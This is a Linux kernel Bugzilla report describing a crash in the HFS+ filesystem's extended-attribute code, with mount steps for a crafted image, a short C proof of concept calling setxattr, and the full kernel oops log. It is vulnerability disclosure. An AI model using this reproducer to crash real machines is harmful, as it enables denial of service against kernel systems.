200295 – BUG() in hfsplus_create_attributes_file() when calling setxattr()

Bug 200295 - BUG() in hfsplus_create_attributes_file() when calling setxattr()

Summary: BUG() in hfsplus_create_attributes_file() when calling setxattr()

Status:	NEW

Alias:	None

Product:	File System
Classification:	Unclassified
Component:	HFS/HFSPLUS (show other bugs)
Hardware:	All Linux

Importance:	P1 normal
Assignee:	fs_hfs@kernel-bugs.osdl.org

URL:
Keywords:

Depends on:
Blocks:

Reported:	2018-06-27 03:56 UTC by Wen Xu
Modified:	2018-06-27 03:56 UTC (History)
CC List:	1 user (show)

See Also:
Kernel Version:	4.18
Subsystem:
Regression:	No
Bisected commit-id:

Attachments
The (compressed) crafted image which causes crash (4.00 MB, application/octet-stream) 2018-06-27 03:56 UTC, Wen Xu	Details
Add an attachment (proposed patch, testcase, etc.)

Description Wen Xu 2018-06-27 03:56:30 UTC

Created attachment 276897 [details]
The (compressed) crafted image which causes crash

- Reproduce
# mkdir mnt
# mount -t hfsplus 5.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *xattr;

  int err;

  static int buf[8192];
  memset(buf, 0, sizeof(buf));

  err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint);

  // xattr
  char buf2[113];
  memset(buf2, 0, sizeof(buf2));
  listxattr(xattr, buf2, sizeof(buf2));
  removexattr(xattr, "user.mime_type");
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE);
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE);

}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}

- Kernel message
[  172.954208] ------------[ cut here ]------------
[  172.954215] kernel BUG at fs/hfsplus/xattr.c:181!
[  172.955390] invalid opcode: 0000 [#1] SMP KASAN PTI
[  172.956718] CPU: 1 PID: 1415 Comm: a.out Not tainted 4.18.0-rc1+ #6
[  172.958053] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  172.960077] RIP: 0010:__hfsplus_setxattr+0x1086/0x1160
[  172.961143] Code: e8 af 0c de ff 4c 8b 85 08 fd ff ff 41 c7 40 38 00 00 00 00 e9 7b f1 ff ff 48 c7 c7 00 40 96 ae e8 93 42 bb ff e9 1a f5 ff ff <0f> 0b 4c 8b 85 b0 fc ff ff 48 8b bd d8 fc ff ff be 04 00 00 00 4c
[  172.965030] RSP: 0018:ffff8801eb687788 EFLAGS: 00010206
[  172.966117] RAX: 0000000000000000 RBX: ffff8801eebb4908 RCX: ffffffffad5bc134
[  172.967574] RDX: dffffc0000000000 RSI: ffff8801eebb4da8 RDI: ffff8801eebb4d58
[  172.969041] RBP: ffff8801eb687b08 R08: ffff8801e288c000 R09: ffffed003dd769b3
[  172.970499] R10: 0000000000000001 R11: ffffed003dd769b2 R12: ffff8801ec198000
[  172.971967] R13: ffff8801eebb4d08 R14: ffff8801e21a0540 R15: ffff8801eb687ae0
[  172.973423] FS:  00007fe64916a700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  172.975069] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  172.976262] CR2: 000000000129c008 CR3: 00000001e5e58000 CR4: 00000000000006e0
[  172.977729] Call Trace:
[  172.978296]  ? unwind_get_return_address+0x36/0x50
[  172.979330]  ? kasan_check_write+0x14/0x20
[  172.980232]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  172.981181]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  172.982394]  ? save_stack+0x46/0xd0
[  172.983133]  ? kasan_kmalloc+0xad/0xe0
[  172.983941]  ? kmem_cache_alloc_trace+0x102/0x200
[  172.984927]  ? hfsplus_setxattr+0x4c/0xb0
[  172.985770]  ? hfsplus_user_setxattr+0x27/0x30
[  172.986716]  ? __vfs_setxattr+0x7c/0xa0
[  172.987522]  ? __vfs_setxattr_noperm+0x8d/0x200
[  172.988478]  ? vfs_setxattr+0xb3/0xc0
[  172.989248]  ? setxattr+0x1b3/0x260
[  172.989982]  ? path_setxattr+0x134/0x170
[  172.990811]  ? __x64_sys_setxattr+0x6d/0x80
[  172.991700]  ? do_syscall_64+0x78/0x170
[  172.992519]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  172.993602]  ? save_stack+0xb5/0xd0
[  172.994339]  ? save_stack+0x46/0xd0
[  172.995077]  ? kasan_kmalloc+0xad/0xe0
[  172.995878]  ? __kmalloc_node+0x11e/0x2e0
[  172.996738]  ? kvmalloc_node+0x31/0x80
[  172.997527]  ? setxattr+0x114/0x260
[  172.998261]  ? path_setxattr+0x134/0x170
[  172.999085]  ? __x64_sys_setxattr+0x6d/0x80
[  172.999973]  ? do_syscall_64+0x78/0x170
[  173.000782]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  173.001870]  ? save_stack+0xb5/0xd0
[  173.002610]  ? save_stack+0x46/0xd0
[  173.003349]  ? __kasan_slab_free+0x13c/0x1a0
[  173.004257]  ? kasan_slab_free+0xe/0x10
[  173.005079]  ? kmem_cache_free+0x89/0x1e0
[  173.005929]  ? putname+0x80/0x90
[  173.006610]  ? filename_lookup+0x191/0x280
[  173.007465]  ? kasan_unpoison_shadow+0x36/0x50
[  173.008407]  ? kasan_kmalloc+0xad/0xe0
[  173.009201]  ? kmem_cache_alloc_trace+0x102/0x200
[  173.010183]  hfsplus_setxattr+0x8a/0xb0
[  173.010992]  hfsplus_user_setxattr+0x27/0x30
[  173.011899]  __vfs_setxattr+0x7c/0xa0
[  173.012675]  __vfs_setxattr_noperm+0x8d/0x200
[  173.013588]  vfs_setxattr+0xb3/0xc0
[  173.014326]  setxattr+0x1b3/0x260
[  173.015031]  ? vfs_setxattr+0xc0/0xc0
[  173.022586]  ? filename_lookup+0x191/0x280
[  173.023449]  ? filename_parentat+0x2b0/0x2b0
[  173.024364]  ? kasan_kmalloc+0xad/0xe0
[  173.025157]  ? kasan_check_write+0x14/0x20
[  173.026040]  ? strncpy_from_user+0xa8/0x1c0
[  173.026923]  ? __mnt_is_readonly.part.13+0x23/0x30
[  173.027936]  ? __mnt_want_write+0x9d/0xb0
[  173.028783]  path_setxattr+0x134/0x170
[  173.029573]  ? setxattr+0x260/0x260
[  173.030317]  ? vm_brk+0x20/0x20
[  173.030986]  __x64_sys_setxattr+0x6d/0x80
[  173.031842]  do_syscall_64+0x78/0x170
[  173.032619]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  173.033695] RIP: 0033:0x7fe648c8b1fa
[  173.034443] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  173.038299] RSP: 002b:00007ffd5dbc6bd8 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc
[  173.039843] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fe648c8b1fa
[  173.041329] RDX: 00007ffd5dbc6c00 RSI: 00000000004008a4 RDI: 000000000129c080
[  173.042795] RBP: 00007ffd5dbc6c80 R08: 0000000000000001 R09: 0000000000000000
[  173.044256] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0
[  173.045710] R13: 00007ffd5dbc6d80 R14: 0000000000000000 R15: 0000000000000000
[  173.047174] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  173.057207] ---[ end trace 7f5a46c7478f1295 ]---
[  173.058199] RIP: 0010:__hfsplus_setxattr+0x1086/0x1160
[  173.059270] Code: e8 af 0c de ff 4c 8b 85 08 fd ff ff 41 c7 40 38 00 00 00 00 e9 7b f1 ff ff 48 c7 c7 00 40 96 ae e8 93 42 bb ff e9 1a f5 ff ff <0f> 0b 4c 8b 85 b0 fc ff ff 48 8b bd d8 fc ff ff be 04 00 00 00 4c
[  173.063633] RSP: 0018:ffff8801eb687788 EFLAGS: 00010206
[  173.065012] RAX: 0000000000000000 RBX: ffff8801eebb4908 RCX: ffffffffad5bc134
[  173.066580] RDX: dffffc0000000000 RSI: ffff8801eebb4da8 RDI: ffff8801eebb4d58
[  173.068219] RBP: ffff8801eb687b08 R08: ffff8801e288c000 R09: ffffed003dd769b3
[  173.069694] R10: 0000000000000001 R11: ffffed003dd769b2 R12: ffff8801ec198000
[  173.071151] R13: ffff8801eebb4d08 R14: ffff8801e21a0540 R15: ffff8801eb687ae0
[  173.072671] FS:  00007fe64916a700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  173.074329] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  173.075505] CR2: 000000000129c008 CR3: 00000001e5e58000 CR4: 00000000000006e0

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/xattr.c#L181
	BUG_ON(i_size_read(attr_file) != 0);

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.

Note You need to log in before you can comment on or make changes to this bug.